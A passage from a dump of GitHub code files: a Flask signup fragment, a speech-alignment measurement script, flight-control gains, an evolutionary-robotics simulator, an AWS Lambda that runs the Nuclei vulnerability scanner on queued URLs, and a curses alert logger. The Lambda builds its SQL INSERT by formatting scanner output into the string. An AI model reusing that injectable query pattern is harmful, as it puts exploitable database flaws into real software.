generate_hash(request.values.get('password'))\n }})\n\n flash('You account has been successfully created. Thanks!', 'success')\n login_user(user, admin=False)\n set_redis_session(user[\"role\"], force=True)\n login_manager.error = False\n return redirect('/user/dashboard')\n # login_user(User(email, user['first_name'] + ' ' + user['last_name']), admin=False)\n else:\n flash('Please fix the errors and proceed.', 'danger')\n\n return render_template('create_password.html', form=form)","repo_name":"VelVenkateshDCKAP/Git-Training","sub_path":"python /task_tracker/controllers/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71062755391","text":"import sys\nimport glob\nimport codecs\nimport re\n\ntens_path = \"/Volumes/tensusers/timzee/cgn/\" if sys.platform == \"darwin\" else \"/vol/tensusers/timzee/cgn/\"\n\nindex_dict = {}\n\n\ndef measureS(ali_l, s_word_i):\n word_dict = {}\n ali_i = {}\n for ali_num, line in enumerate(ali_l, 1):\n line_list = line[:-1].split(\"\\t\")\n if ali_num == 1:\n for n_num, n in enumerate(line_list, 0):\n ali_i[n] = n_num\n else:\n start_t = float(line_list[ali_i[\"start\"]])\n end_t = start_t + float(line_list[ali_i[\"dur\"]])\n kal_lab = line_list[ali_i[\"phone\"]]\n if kal_lab in [\"SIL\"]:\n continue\n phon, posi = kal_lab.split(\"_\")\n if posi in [\"B\", \"S\"]:\n word_num = len(word_dict) + 1\n word_dict[word_num] = [(phon, start_t, end_t)]\n else:\n word_num = len(word_dict)\n word_dict[word_num].append((phon, start_t, end_t))\n s_label = word_dict[int(s_word_i)][-1][0]\n if s_label != \"s\":\n s_dur = \"NA\"\n else:\n s_dur = word_dict[int(s_word_i)][-1][2] - word_dict[int(s_word_i)][-1][1]\n return s_dur\n\n\ndef readWrite():\n with codecs.open(tens_path + \"all_s_combined_dur.csv\", \"w\", encoding=\"utf-8\") as h:\n with codecs.open(tens_path + \"all_s_combined.csv\", encoding=\"utf-8\") as f:\n for num, line in enumerate(f, 1):\n if num % 100 == 0:\n print((num / 575823) * 100)\n line_list = line[:-1].split(\",\")\n if num == 1:\n for col_num, name in enumerate(line_list, 0):\n index_dict[name] = col_num\n h.write(line[:-1] + \",s_dur\\n\")\n else:\n f_path = line_list[index_dict[\"wav\"]]\n chunk_start = line_list[index_dict[\"chunk_start\"]]\n chunk_end = line_list[index_dict[\"chunk_end\"]]\n word_chunk_i = line_list[index_dict[\"word_chunk_i\"]]\n glob_list = glob.glob(tens_path + \"KALDI_output/CGN_beam_5_100_v3/{0}_*_{1}_{2}.ali\".format(re.sub(r\"/\", \"_\", f_path), chunk_start, chunk_end))\n# print(f_path)\n if len(glob_list) > 0:\n print(glob_list[0])\n with open(glob_list[0], \"r\") as g:\n ali_lines = g.readlines()\n if len(ali_lines) > 1:\n s_length = measureS(ali_lines, word_chunk_i)\n print(s_length)\n h.write(line[:-1] + \",\" + str(s_length) + \"\\n\")\n\n\nif __name__ == '__main__':\n readWrite()\n","repo_name":"timjzee/dmc-scripts","sub_path":"measureS.py","file_name":"measureS.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25032573960","text":"import sys\nsys.path.append('..')\nimport numpy as np\nimport chap5.transfer_function_coef as TF\nimport parameters.aerosonde_parameters as MAV\n# # import chap4.mav_dynamics as mav\n# from chap4.mav_dynamics import mav_dynamics\n# import parameters.simulation_parameters as SIM\n# # mav = mav_dynamics(SIM.ts_simulation)\ng = MAV.gravity\n# sigma =\nVa0 = MAV.Va0\nVa = Va0\nVg = Va\ndelta_a_max = .5\ndelta_e_max = .7\ndelta_r_max = .5\ne_phi_max = np.radians(45)\ne_theta_max = np.radians(35)\ne_beta_max = np.radians(45)\n\n# Longitudinal\nwn_theta = np.sqrt(TF.a_theta2 + delta_e_max/e_theta_max*np.abs(TF.a_theta3))\nzeta_theta = 0.4\nW_h = 26#22 #18 before EKF\nwn_h = 1/W_h*wn_theta\nzeta_h = 0.85#0.707\n\n# Lateral\nwn_phi = np.sqrt(np.abs(TF.a_phi2)*delta_a_max/e_phi_max)\nzeta_phi = 0.3\nW_chi = 15#12 #8 before EKF\nwn_chi = 1/W_chi*wn_phi\nzeta_chi = 0.5\nzeta_beta = 0.707\n\n# Airspeed\nwn_V = wn_h # FIX\nzeta_V = 0.707\n\n#----------roll loop-------------\nroll_kp = delta_a_max/e_phi_max*np.sign(TF.a_phi2)\nroll_kd = (2*zeta_phi*wn_phi - TF.a_phi1)/TF.a_phi2\n\n#----------course loop-------------\ncourse_kp = 2*zeta_chi*wn_chi*Vg/g\ncourse_ki = wn_chi**2*Vg/g\n\n#----------sideslip loop-------------\nsideslip_kp = delta_r_max/e_beta_max*np.sign(TF.a_beta2)\nsideslip_ki = 1/TF.a_beta2*((TF.a_beta1 + TF.a_beta2*sideslip_kp)/(2*zeta_beta))\n\n# #----------yaw damper-------------\n# yaw_damper_tau_r =\n# yaw_damper_kp = 0.5\n\n#----------pitch loop-------------\npitch_kp = delta_e_max/e_theta_max*np.sign(TF.a_theta3)\npitch_kd = (2*zeta_theta*wn_theta - TF.a_theta1)/TF.a_theta3\nK_theta_DC = (pitch_kp*TF.a_theta3)/(TF.a_theta2 + pitch_kp*TF.a_theta3)\n\n#----------altitude loop-------------\naltitude_kp = (2*zeta_h*wn_h)/(K_theta_DC*Va)\naltitude_ki = wn_h**2/(K_theta_DC*Va)\n# altitude_zone = # FIX\n\n#---------airspeed hold using throttle---------------\nairspeed_throttle_kp = (2*zeta_V*wn_V - TF.a_V1)/TF.a_V2\nairspeed_throttle_ki = wn_V**2/TF.a_V2\n","repo_name":"natetoombs/FlightDynamicsPy","sub_path":"parameters/control_parameters.py","file_name":"control_parameters.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6080660464","text":"from Simulator import *\nimport pickle\n\n\"\"\"\n__author__ = Simon Hofmann\"\n__credits__ = [\"Simon Hofmann\", \"Katja Abramova\", \"Willem Zuidema\"]\n__version__ = \"1.0.1\"\n__date__ \"2016\"\n__maintainer__ = \"Simon Hofmann\"\n__email__ = \"simon.hofmann@protonmail.com\"\n__status__ = \"Development\"\n\"\"\"\n\n# Agmon & Beer (2013): \"real-valued GA\":\n'''\n\"Each genetic string is a search vector of real numbers in the range 61,\nand is scaled by each parameter’s defined range\n(...)\nThe top-performing individual is copied twice into the next generation’s\npopulation, and the rest of the population is repopulated through\nfitness-proportionate selection and mutation, with a\nmutation variance of 0.25.\" - Agmon,Beer (2013)\n\nparameters to evolve:\n- time constant: τ (tau)\n- weights: w (weights of interneurons, sensory and motor neurons)\n- bias: θ (theta)\n'''\n\n\nclass Evolution(Simulate):\n\n def __init__(self, pop_size=10, simlength=1000):\n \"\"\"\n :param pop_size:\n \"\"\"\n super(self.__class__, self).__init__(simlength) # self.agent, self.simlength\n\n self.genome = self.create_genome() # vector of parameters\n\n self.pop_list = self.__create_pop_list(pop_size)\n\n self.generation = 0\n\n self.filename = \"\" # starts with \"sim....\"\n\n def create_genome(self):\n \"\"\"\n Reshape parameter matrices into 1-D vectors and concatenate them\n :rtype: vector\n :return: vector of all parameters\n \"\"\"\n a = np.reshape(self.agent.W, (self.agent.W.size, 1))\n g = np.reshape(self.agent.WM, (self.agent.WM.size, 1))\n t = np.reshape(self.agent.WV, (self.agent.WV.size, 1))\n c = np.reshape(self.agent.Theta, (self.agent.Theta.size, 1))\n u = np.reshape(self.agent.Tau, (self.agent.Tau.size, 1))\n\n return np.concatenate((a, g, t, c, u))\n\n def implement_genome(self, genome_string):\n\n assert genome_string.size == self.genome.size, \"Genome has not the right size\"\n\n a = self.agent.W.size\n g = self.agent.WM.size\n t = self.agent.WV.size\n c = self.agent.Theta.size\n u = self.agent.Tau.size\n\n w = genome_string[:a]\n wm = genome_string[a:a+g]\n wv = genome_string[a+g:a+g+t]\n theta = genome_string[a+g+t:a+g+t+c]\n tau = genome_string[a+g+t+c:a+g+t+c+u]\n\n self.agent.W = np.matrix(np.reshape(w, (self.agent.N, self.agent.N)))\n self.agent.WM = np.matrix(np.reshape(wm, (g, 1))) # for poplists before 1.June take the reshape out (see github, also CTRNN.py)\n self.agent.WV = np.matrix(np.reshape(wv, (t, 1)))\n self.agent.Theta = np.matrix(np.reshape(theta, (c, 1)))\n self.agent.Tau = np.matrix(np.reshape(tau, (u, 1)))\n\n # Update the self.genome:\n if not isinstance(genome_string, np.matrix):\n genome_string = np.matrix(genome_string).transpose()\n\n self.genome = genome_string\n\n def fitness(self):\n \"\"\"\n Fitness is the distance to target after the simulation run.\n :rtype: distance to Target (int)\n \"\"\"\n return np.linalg.norm(self.agent.position_target - self.agent.position)\n\n def __create_pop_list(self, pop_size):\n \"\"\"\n :param pop_size: Amount of individuals per Population\n :return: ordered list (via fitness) of all agents\n \"\"\"\n\n poplist = np.zeros((pop_size, np.size(self.genome)+2))\n\n for i in range(pop_size):\n poplist[i, 0] = i+1 # enumerate the list\n poplist[i, 2:] = self.genome.transpose() # the corresponding genome will be stored\n self.agent = CatchBot() # Create new agent\n self.genome = self.create_genome() # ... and its genome\n\n return poplist\n\n def pick_best(self):\n return self.pop_list[(0, 1), :]\n\n def gen_code(self):\n gens = OrderedDict([(\"A\", self.agent.W.size),\n (\"G\", self.agent.WM.size),\n (\"T\", self.agent.WV.size),\n (\"C\", self.agent.Theta.size),\n (\"U\", self.agent.Tau.size)])\n return gens\n\n def _reproduction(self, mutation_var, fps=False):\n \"\"\"\n If fitness proportionate selection (fps) = False:\n +: sexual reproduction, saves best, adds new random bots\n -: Computationally expensive.\n\n 1) Takes the best agent and copy it twice in new population.\n 2) Takes the second best agent and copy it once in new population.\n 3) Creates two children of two parents. Since step 1) & 2) we have a chance of genetic crossover of 100%.\n Furthermore, we use whole sections of the genome for the crossover (e.g. all W, or all Thetas)\n 4) Fitness-proportionate selection of 2 further agents\n 5) Fill the rest with randomly created agents\n\n 6) All but the first best agent will fall under a mutation with a variance of .25 (default)\n - time constant: τ (tau) in range [1, 10]\n - weights: w (weights of interneurons, sensory and motor neurons) in range [-13, 13]\n - bias: θ (theta) in range [-13, 13]\n\n > > > > > < < < < < > > > > > < < < < < > > > > > < < < < < > > > > > < < < < < > > > > > < < < < <\n\n If fps = True:\n More simple, asexual, fitness-proportionate selection.\n\n + : Computationally more efficient.\n - : Might need more Generations to converge\n\n All new agents will fall under a mutation with a variance of .25 (default):\n - time constant: τ (tau) in range [1, 10]\n - weights: w (weights of interneurons, sensory and motor neurons) in range [-13, 13]\n - bias: θ (theta) in range [-13, 13]\n\n :param mutation_var: given by run_evolution() (0.25 by default, according to Agmon & Beer (2013))\n :return: self.pop_list = repopulated list (new_population)\n \"\"\"\n\n gens = self.gen_code()\n\n if fps:\n\n new_population = np.zeros(self.pop_list.shape) # This will be turned in the end...\n\n # Algorithm for fitness proportionate selection:\n # Source: http://stackoverflow.com/questions/298301/roulette-wheel-selection-algorithm/320788#320788\n # >>\n\n fitness = copy.copy(self.pop_list[:, 1])\n fitness = 1-normalize(fitness) # sign is correct, apparently\n\n total_fitness = sum(fitness)\n relative_fitness = [f/total_fitness for f in fitness]\n\n probs = [sum(relative_fitness[:i+1]) for i in range(len(relative_fitness))]\n\n for num in range(new_population.shape[0]):\n r = np.random.random() # random sample of continous uniform distribution [0,1)\n for (i, individual) in enumerate(self.pop_list):\n if r <= probs[i]:\n new_population[num, :] = individual\n break\n\n # <<\n\n else: # if fps is false: Complex Evolution\n\n new_population = copy.copy(self.pop_list) # This will be turned in the end...\n\n new_population[0, 0] = 1 # reset enumeration for first agent\n\n # 1)\n # is already on first place, here we set it again on the second place\n new_population[1, :] = copy.copy(self.pop_list[0, :])\n # 2)\n new_population[2, :] = copy.copy(self.pop_list[1, :])\n # 3)\n new_population[3, :] = copy.copy(self.pop_list[0, :])\n new_population[4, :] = copy.copy(self.pop_list[0, :])\n\n for i in [3, 4]: # => new_population[(3,4),:]\n\n # Alternatively, here we pick randomly 2 single genomic loci:\n # index = np.argmax(np.random.sample(self.genome.size)) + 2 -1\n # index2 = np.argmax(np.random.sample(self.genome.size)) +2 -1\n # new_population[i, index] = copy.copy(self.pop_list[1, index]) # crossover from second parent\n # new_population[i, index2] = copy.copy(self.pop_list[1, index2])\n\n # Crossover of a whole genome section of the second parent:\n\n choice = np.random.choice([gen for gen in gens]) # Random choice of a section in genome\n\n index = 0 # indexing the section in whole genome string\n for gen in gens:\n index += gens[gen]\n if gen == choice:\n break\n index += 2 # leaves the number and fitness of agent out (new_population[:,(0,1)])\n\n # crossover from second parent\n new_population[i, (index-gens[choice]):index] = copy.copy(self.pop_list[1, (index-gens[choice]):index])\n\n # Test: self.agent.PARAMETER (depending on choice)\n\n # 4)\n norm_pop = normalize(np.power(self.pop_list[2:, 1], -1)) if \\\n np.any(self.pop_list[2:, 1] != 0) else self.pop_list[2:, 1]\n rand_pop = np.random.sample(np.size(self.pop_list[2:, 1]))\n norm_rand = norm_pop * rand_pop\n ordered = copy.copy(self.pop_list[np.argsort(-norm_rand)+2, :])\n new_population[5, :] = ordered[0, :]\n new_population[6, :] = ordered[1, :]\n\n # 5)\n for i in range(new_population[7:, :].shape[0]):\n self.agent = CatchBot() # Create new agent\n self.genome = self.create_genome() # ... and its genome\n new_population[7+i, 2:] = self.genome.transpose()\n\n # 6) Mutation (for fps=True & False):\n\n agtc = sum(gens.values()) - gens[\"U\"] # sum of all gen-sizes, except Tau\n u = gens[\"U\"] # == self.agent.Tau.size\n\n mu, sigma = 0, np.sqrt(mutation_var) # mean and standard deviation\n\n for i in range(1-fps, new_population.shape[0]): # if fps = False => range(1,size), else => range(0,size)\n\n mutation_agtc = np.random.normal(mu, sigma, agtc)\n mutation_u = np.random.normal(mu, sigma, u)\n\n agtc_mutated = new_population[i, 2:agtc+2] + mutation_agtc\n\n # Replace values beyond the range with max.range\n agtc_mutated[agtc_mutated > self.agent.W_RANGE[1]] = self.agent.W_RANGE[1]\n # ... or min.range (T_RANGE = W.RANGE =[-13, 13])\n agtc_mutated[agtc_mutated < self.agent.W_RANGE[0]] = self.agent.W_RANGE[0]\n\n new_population[i, 2:agtc+2] = agtc_mutated\n\n u_mutated = new_population[i, (agtc+2):] + mutation_u\n\n # Replace values beyond the range with max.range\n u_mutated[u_mutated > self.agent.TAU_RANGE[1]] = self.agent.TAU_RANGE[1]\n # ... or min.range (TAU_RANGE = [1, 10])\n u_mutated[u_mutated < self.agent.TAU_RANGE[0]] = self.agent.TAU_RANGE[0]\n\n new_population[i, (agtc+2):] = u_mutated\n\n new_population[i, 0] = i+1 # reset enumeration\n new_population[i, 1] = 0 # reset fitness\n\n self.pop_list = copy.copy(new_population)\n\n @staticmethod\n def _set_target(position_agent=[50, 50], angle_to_target=np.pi/2, distance=30, iscomplex=False):\n\n if not iscomplex: # We just create one target, depending on the angle:\n pos_target = np.array(position_agent) + np.array([np.cos(angle_to_target), np.sin(angle_to_target)]) * distance\n\n return list([pos_target]) # This form of output is necessarry for _simulate_next_population()\n\n else: # We create different Targets around the Agent, depending on its Position (ignoring the input angle):\n circle = [0, np.pi/4, np.pi/2, 3*np.pi/4, np.pi, 5*np.pi/4, 3*np.pi/2, 7*np.pi/4]\n pos_target = []\n scalar = [.5, 2, 1, 1, 1.5, .5, 2, 1.5]\n\n for j, cle in enumerate(circle):\n tpos = np.array(position_agent) + np.array([np.cos(cle), np.sin(cle)]) * distance * scalar[j]\n pos_target.append(tpos)\n\n return pos_target\n\n def _simulate_next_population(self, position_agent, pos_target):\n \"\"\"\n Run simulation => fitness\n We save the distance to (each) target. The fitness will be the (average) distance\n If we have more than one target:\n - each agent will run through all trials (each trial the target is on a different position).\n - we take average Fitness over all ('complex trials')\n\n :param position_agent:\n :param pos_target:\n :return: Updates sorted pop_list\n \"\"\"\n\n assert self.pop_list[-1, 1] == 0, \"This population run already its simulation\"\n\n for i, string in enumerate(self.pop_list): # Run simulation with each agent\n\n genome_string = string[2:]\n\n fitness = []\n\n for tpos in pos_target:\n\n # reset self.agent and set new target position\n self.agent = CatchBot(position_agent=position_agent, position_target=[tpos[0], tpos[1]])\n\n self.implement_genome(genome_string) # implement the current genome in agent\n\n self.agent.movement(self.simlength)\n\n fitness.append(self.fitness())\n\n self.pop_list[i, 1] = np.sum(fitness)/len(fitness) # agent's average fitness will be stored\n\n self.pop_list = copy.copy(mat_sort(self.pop_list, index=1))\n\n def run_evolution(self, generations, mutation_var=0.10, complex_trials=True, fit_prop_sel=False,\n position_agent=[50, 50], angle_to_target=np.pi/2, distance_to_target=30):\n \"\"\"\n Run evolution for n-generations with particular mutation rate.\n\n :param generations: number of generations to run\n :param mutation_var: test out smaller value, 0.25 by default, according to Agmon & Beer (2013)\n :param complex_trials: if true multiple targets to catch\n :param fit_prop_sel: fitness proportionate selection\n :param position_agent: start position of agent in all trials\n :param angle_to_target: defines angle to target (in case of complex_trials, redundant)\n :param distance_to_target: defines corresponding distance to target (in case of complex_trials, redundant)\n \"\"\"\n\n # Ask whether results should be saved in external file\n save = save_request()\n\n # Run evolution:\n fitness_progress = np.zeros((generations, 3))\n\n pos_target = self._set_target(position_agent=position_agent,\n angle_to_target=angle_to_target,\n distance=distance_to_target,\n iscomplex=complex_trials)\n\n for i in range(generations):\n\n start_timer = datetime.datetime.now().replace(microsecond=0)\n\n self._reproduction(mutation_var=mutation_var, fps=fit_prop_sel)\n\n self._simulate_next_population(position_agent=position_agent,\n pos_target=pos_target)\n\n fitness_progress[i, 1:] = np.round(self.pick_best()[:, 1], 2)\n\n self.generation += 1\n\n fitness_progress[i, 0] = self.generation\n\n print(fitness_progress[i, 1:], \"Generation\", self.generation)\n\n # Estimate Duration of Evolution\n end_timer = datetime.datetime.now().replace(microsecond=0)\n duration = end_timer - start_timer\n rest_duration = duration * (generations - (i + 1))\n print(\"Time passed to evolve Generation {}: {} [h:m:s]\".format(self.generation-1, duration))\n print(\"Estimated time to evolve the rest {} Generations: {} [h:m:s]\".format(generations-(i + 1),\n rest_duration))\n\n # Save in external file:\n if save:\n\n self.filename = \"sim{}.mut{}.Gen{}-{}(Fitness {})\".format(self.simlength,\n mutation_var,\n self.generation - generations + 1,\n self.generation, np.round(self.pop_list[0, 1], 2))\n\n pickle.dump(self.pop_list, open('./poplists/Poplist.{}'.format(self.filename), 'wb'))\n pickle.dump(np.round(fitness_progress, 2),\n open('./poplists/Fitness_progress.{}'.format(self.filename), 'wb'))\n\n print('Evolution terminated. pop_list saved \\n'\n '(Filename: \"Poplist.{}\")'.format(self.filename))\n else:\n print('Evolution terminated. \\n'\n '(Caution: pop_list is not saved in external file)')\n\n def reimplement_population(self, filename=None, plot=False):\n\n if filename is None:\n filename = self.filename\n print(\"Reimplements its own pop_list file\")\n\n # Reimplement: pop_list, simlength, Generation\n self.pop_list = pickle.load(open('./poplists/Poplist.{}'.format(filename), 'rb'))\n\n self.simlength = int(filename[filename.find('m')+1: filename.find('.')]) # depends on filename\n\n fitness_progress = pickle.load(open('./poplists/Fitness_progress.{}'.format(filename), 'rb'))\n self.generation = int(fitness_progress[-1, 0])\n\n self.filename = filename\n\n if plot:\n\n animation = animation_request()\n\n # here we plot the fitness progress of all generation\n plt.figure()\n plt.plot(fitness_progress[:, 1])\n plt.plot(fitness_progress[:, 2])\n\n # Here we plot the trajectory of the best agent:\n\n self.plot_pop_list(animation=animation)\n print(\"Plot the best agent\")\n\n global n # this is needed for self.close()\n n = 2\n\n def plot_pop_list(self, n_agents=1, position_agent=[50, 50], animation=False):\n\n global n\n n = n_agents\n\n pos_target = self._set_target(position_agent=position_agent, iscomplex=True)\n col = [\"royalblue\", \"tomato\", \"palegreen\", \"fuchsia\", \"gold\", \"darkviolet\", \"darkslategray\", \"orange\"] # colors.cnames\n\n for i in range(n_agents):\n\n col_count = 0\n\n if not animation:\n plt.figure(figsize=(10, 6), dpi=80)\n else:\n plt.figure(figsize=(10, 6), dpi=40)\n\n # Define boarders\n plt.xlim(0, 100)\n plt.ylim(-15, 100)\n\n for tpos in pos_target:\n self.agent = CatchBot(position_agent=position_agent)\n self.agent.position_target = tpos\n self.implement_genome(self.pop_list[i, 2:])\n plt.plot(tpos[0], tpos[1], 's', c=col[col_count]) # Plot Targets\n self.run_and_plot(colour=col[col_count], animation=animation) # Plot Trajectory\n\n col_count += 1\n\n plt.plot(position_agent[0], position_agent[1], 'bo')\n\n print(np.round(self.pop_list[0:n_agents, 0:3], 2))\n if n_agents > 1:\n print(\"Close all Windows with close()\")\n\n @staticmethod\n def close():\n for j in range(n): # n is from the global variable of plot_pop_list()/reimplement_population()\n plt.close()\n\n# t3 = Evolution(simlength=50)\n# t3.run_evolution(Generations=10)\n# t3.plot_pop_list(2)\n# t3.close()\n","repo_name":"SHEscher/Joint-Action","sub_path":"Evolution.py","file_name":"Evolution.py","file_ext":"py","file_size_in_byte":19620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"968011423","text":"import json\nimport boto3\nimport os\nimport io\nimport urllib.request\nimport zipfile\nimport subprocess\nimport re\nimport pymysql\nimport base64\nfrom botocore.exceptions import ClientError\nfrom os.path import exists\n\nsqsUrl = os.environ.get('sqsUrl')\nmountPath = os.environ.get('mountPath')\nnucleiBinaryPath = mountPath+\"/nuclei\"\nconnection = None\n\ndef get_connection():\n try:\n print(\"Connecting to database\")\n DBEndPoint = os.environ.get(\"DB_HOST\")\n DBUserName = os.environ.get(\"DB_USER\", \"test\")\n DBName = os.environ.get(\"APP_DB_NAME\")\n password = get_password()\n conn = pymysql.connect(\n host=DBEndPoint,\n user=DBUserName,\n password=password,\n database=DBName,\n charset='utf8mb4',\n ssl_ca='rds-ca-2019-root.pem',\n ssl_verify_cert=True\n )\n return conn\n except Exception as e:\n print(\"While connecting failed due to :{0}\".format(str(e)))\n return None\n\n# Sample code straight from AWS\ndef get_password():\n print(\"Fetching DB password\")\n secret_name = os.environ.get(\"APP_DB_PW\")\n region_name = os.environ.get(\"APP_REGION\")\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n print(\"Secrets manager client created\")\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n print(\"Attempting to fetch secret from client\")\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n print(\"Error:\\n\")\n print(e)\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS key.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n print(\"Returning Secret\")\n if 'SecretString' in get_secret_value_response:\n return get_secret_value_response['SecretString']\n else:\n return base64.b64decode(get_secret_value_response['SecretBinary'])\n\ndef install_nuclei():\n print(\"Downloading nuclei to EFS as it is not already present\")\n nucleiUrl = os.environ.get('nucleiUrl')\n zipPath = mountPath + \"/nuclei.zip\"\n urllib.request.urlretrieve(nucleiUrl, filename = zipPath)\n print(\"Nuclei Downloaded\")\n with zipfile.ZipFile(zipPath,\"r\") as zip_ref:\n zip_ref.extractall(mountPath)\n os.system(\"chmod 754 \"+nucleiBinaryPath)\n print(\"Nuclei installed\")\n\ndef add_to_db(results):\n print(\"Adding results to DB\")\n global connection\n try:\n if connection is None:\n print(\"No existing DB connection, connecting..\")\n connection = get_connection()\n if connection is None:\n print(\"Connection to DB could not be established, aborting\")\n return {\"status\": \"Error\", \"message\": \"Failed\"}\n with connection:\n with connection.cursor() as cursor:\n for result in results:\n print(\"Creating query for result:\")\n print(result)\n query = \"INSERT INTO vuln_db (timestamp_of_discovery, severity, cve_or_name, category, url, additional_info) VALUES ('{ts}', '{sev}', '{name}', '{category}', '{url}', '{info}')\".format(\n ts = result[1],\n sev = result[4],\n category = result[3],\n name = result[2],\n url = result[0],\n info = '' if len(result) < 6 else result[5]\n )\n print(\"Query:\\n\"+query)\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"Query Results:\")\n results = []\n for row in results:\n results.append(row)\n print(row)\n connection.commit()\n except Exception as e:\n print(\"Failed adding to DB due to :{0}\".format(str(e)))\n try:\n connection.close()\n raise e\n except Exception as e:\n connection = None\n print(\"Failed to close DB connection due to :{0}\".format(str(e)))\n raise e\n\ndef lambda_handler(event, context):\n print(\"Checking if Nuclei is installed\")\n if not exists(nucleiBinaryPath):\n install_nuclei()\n print(\"Received event: \"+json.dumps(event))\n targets = []\n if \"Records\" in event:\n targets.extend([json.loads(record[\"body\"]) for record in event[\"Records\"]])\n else:\n print(\"No records found in event:\"+json.dumps(event))\n print(\"Targets to scan:\")\n print(targets)\n results = []\n for target in targets:\n print(\"Scanning beginning for URL:\\n\"+target[\"url\"])\n args = (nucleiBinaryPath, \"-u\", target[\"url\"], \"-silent\", \"-nc\")\n popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n popen.wait()\n print(\"Scanned completed for URL:\\n\"+target[\"url\"])\n print(\"Scan results:\")\n popen.wait()\n for line in io.TextIOWrapper(popen.stdout, encoding=\"utf-8\"):\n print(line)\n result = [target[\"url\"]]\n result.extend(re.findall('\\[(.*?)\\]', line))\n results.append(result)\n return add_to_db(results)","repo_name":"Jamolo5/aws-nuclei","sub_path":"scanner/scanner/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11906409539","text":"import curses\nimport atexit\nfrom datetime import datetime\n\n# This class is responsible for terminal output\nclass Logger():\n def __init__(self, *args, **kwargs):\n self._stdscr = curses.initscr()\n height, width = self._stdscr.getmaxyx()\n\n curses.start_color()\n curses.use_default_colors()\n\n self._initialize_log()\n atexit.register(curses.endwin)\n\n def _initialize_log(self):\n # Box hHaders\n DIVIDER = \"---------------------------------------------\"\n self._width = len(DIVIDER)\n\n TIME_ACTIVE = \"Time Active:\"\n TIME_HEALTY = \"Time Healthy:\"\n TIME_CRITICAL = \"Time Critical:\"\n\n HITS_TOTAL = \"Hits (Total):\"\n HITS_2_MIN = \"Hits (Last Two Minutes):\"\n\n DEFAULT_TIME = \"0:00:00.00\"\n\n # Set up summary\n self._stdscr.addstr(0, 0, \"Summary\")\n self._stdscr.addstr(1, 0, DIVIDER)\n self._stdscr.addstr(2, 0, TIME_ACTIVE)\n self._stdscr.addstr(3, 0, TIME_HEALTY)\n self._stdscr.addstr(4, 0, TIME_CRITICAL)\n self._stdscr.addstr(6, 0, HITS_TOTAL)\n self._stdscr.addstr(7, 0, HITS_2_MIN)\n\n # Set up alerts\n self._alerts_bottom = 11\n self._stdscr.addstr(self._alerts_bottom - 1, 0, \"Alerts:\")\n self._stdscr.addstr(self._alerts_bottom, 0, DIVIDER)\n\n self._top_sites_padding = 2\n\n self._stdscr.addstr(self._top_sites_padding + self._alerts_bottom, 0, \"Top Sites by Hits (Updated every 10 s):\")\n self._stdscr.addstr(self._top_sites_padding + self._alerts_bottom + 1, 0, DIVIDER)\n\n self._stdscr.addstr(3, self._width - len(DEFAULT_TIME), DEFAULT_TIME)\n self._stdscr.addstr(4, self._width - len(DEFAULT_TIME), DEFAULT_TIME)\n\n self._stdscr.refresh()\n\n def add_critical_status_alert(self, hits):\n alert = \"High traffic generated an alert! Hits (Last 2 Min): {}, Triggered at {}\".format(\n hits, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n self._add_alert(alert)\n\n def add_healthy_status_alert(self, hits):\n alert = \"Traffic returned to the expected threshold at {}\".format(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self._add_alert(alert)\n\n def _add_alert(self, alert):\n self._stdscr.move(self._alerts_bottom + 1, 0)\n self._stdscr.insertln()\n self._stdscr.addstr(self._alerts_bottom + 1, 0, alert)\n self._stdscr.refresh()\n self._alerts_bottom += 1\n\n def _format_time(self, elapsed):\n elapsed_str = str(elapsed)[:10]\n if len(elapsed_str) <= 8:\n elapsed_str += \".00\"\n return elapsed_str\n\n def update_timer(self, elapsed, healthy, critical):\n elapsed_str = self._format_time(elapsed)\n start = self._width - len(elapsed_str)\n self._stdscr.addstr(2, start, elapsed_str)\n self._stdscr.refresh()\n\n self._update_time_healthy(healthy)\n self._update_time_critical(critical)\n\n def _update_time_healthy(self, elapsed):\n time = self._format_time(elapsed)\n start = self._width - len(time)\n self._stdscr.addstr(3, start, time)\n self._stdscr.refresh()\n\n def _update_time_critical(self, elapsed):\n time = self._format_time(elapsed)\n start = self._width - len(time)\n self._stdscr.addstr(4, start, time)\n self._stdscr.refresh()\n\n def update_hits(self, hits):\n # Clear the last 10 characters\n hits_str = str(hits)\n self._stdscr.addstr(6, self._width - len(hits_str), hits_str)\n self._stdscr.refresh()\n\n def update_hits_2_min(self, hits):\n # Clear the last 10 